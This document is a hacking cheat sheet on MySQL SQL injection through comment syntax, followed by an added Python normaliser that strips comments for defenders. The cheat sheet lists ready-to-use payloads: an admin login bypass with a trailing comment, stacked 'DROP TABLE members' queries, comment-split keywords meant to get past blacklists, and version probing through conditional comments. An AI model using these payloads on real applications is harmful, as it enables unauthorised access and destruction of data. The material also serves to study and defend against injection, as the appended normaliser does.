====== Hacking - SQL Injection - MySQL - Comments ======
===== Line Comments =====
Comments out the rest of the query.
Line comments are generally useful for ignoring the rest of the query, so you don't have to deal with fixing the syntax of whatever follows the injection point.
DROP sampletable;--
DROP sampletable;#
----
==== Line Comments Sample SQL Injection Attacks ====
Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you in as the admin user, because the rest of the SQL query (the password check) will be ignored.
----
===== Inline Comments =====
Comment out the rest of the query by not closing them, or use inline comments for bypassing blacklisting, removing spaces, obfuscating, and determining database versions.
/*Comment Here*/
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
----
==== Special Comment Syntax for MySQL ====
This is a special comment syntax for MySQL.
/*! MYSQL Special SQL */
It's perfect for detecting the MySQL version. Code placed inside these comments is executed by MySQL only; other databases treat it as an ordinary comment. You can also use it to execute some code only if the server version is higher than the supplied version number.
SELECT /*!32302 1/0, */ 1 FROM tablename
----
==== Classical Inline Comment SQL Injection Attack Samples ====
ID: 10; DROP TABLE members /*
Simply gets rid of the other stuff at the end of the query. Same as:
10; DROP TABLE members --
----
==== Division by 0 error ====
SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw a division by 0 error if the MySQL version is higher than 3.23.02.
----
==== MySQL Version Detection Sample Attacks ====
ID: /*!32302 10*/
ID: 10
You will get the same response for both if the MySQL version is higher than 3.23.02.
----
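As an added example (not part of the original cheat sheet), here is a small Python normaliser that strips the three MySQL comment styles described above the way the server does, so a defender reviewing a suspicious parameter can see the effective statement and log which comment tricks were used. It follows MySQL's rule that ''--'' only starts a comment when followed by whitespace, so the test payload carries a trailing space; the ''server_version'' parameter is an assumption of this example and uses the same NNNNN numbering as ''/*!NNNNN */''.

```python
import re
from dataclasses import dataclass, field

@dataclass
class Result:
    sql: str                                  # effective statement after comment removal
    findings: list = field(default_factory=list)  # which comment constructs were seen

def normalize_mysql(sql: str, server_version: int = 80000) -> Result:
    """Strip MySQL comments like the server does, so comment-based obfuscation
    collapses to the effective statement. server_version (assumed parameter)
    uses /*!NNNNN */ numbering: 3.23.02 -> 32302, 8.0.0 -> 80000. A conditional
    comment body is kept only when server_version >= NNNNN ('/*!' with no
    number means any MySQL)."""
    out, findings = [], []
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        if c in ("'", '"', '`'):                     # copy quoted literal verbatim
            j = i + 1
            while j < n and sql[j] != c:
                j += 2 if sql[j] == '\\' else 1      # skip backslash escapes
            out.append(sql[i:j + 1]); i = j + 1
        elif c == '#' or (sql.startswith('--', i) and (i + 2 == n or sql[i + 2] in ' \t\r\n')):
            findings.append('line comment: rest of statement ignored')
            break                                    # everything after it is dead text
        elif sql.startswith('/*', i):
            end = sql.find('*/', i + 2)
            body = sql[i + 2:] if end < 0 else sql[i + 2:end]
            if end < 0:
                findings.append('unterminated /* comment: rest of statement ignored')
            if body.startswith('!'):                 # MySQL-only conditional comment
                m = re.match(r'!(\d{5})?', body)
                needed = int(m.group(1)) if m.group(1) else 0
                if server_version >= needed:
                    findings.append(f'conditional comment executed (needs >= {needed})')
                    out.append(body[m.end():])       # body becomes part of the statement
                else:
                    findings.append(f'conditional comment skipped (needs >= {needed})')
            else:
                findings.append('inline comment removed')
                out.append(' ')                      # a comment separates tokens like whitespace
            i = n if end < 0 else end + 2
        else:
            out.append(c); i += 1
    return Result(re.sub(r'\s+', ' ', ''.join(out)).strip(), findings)
```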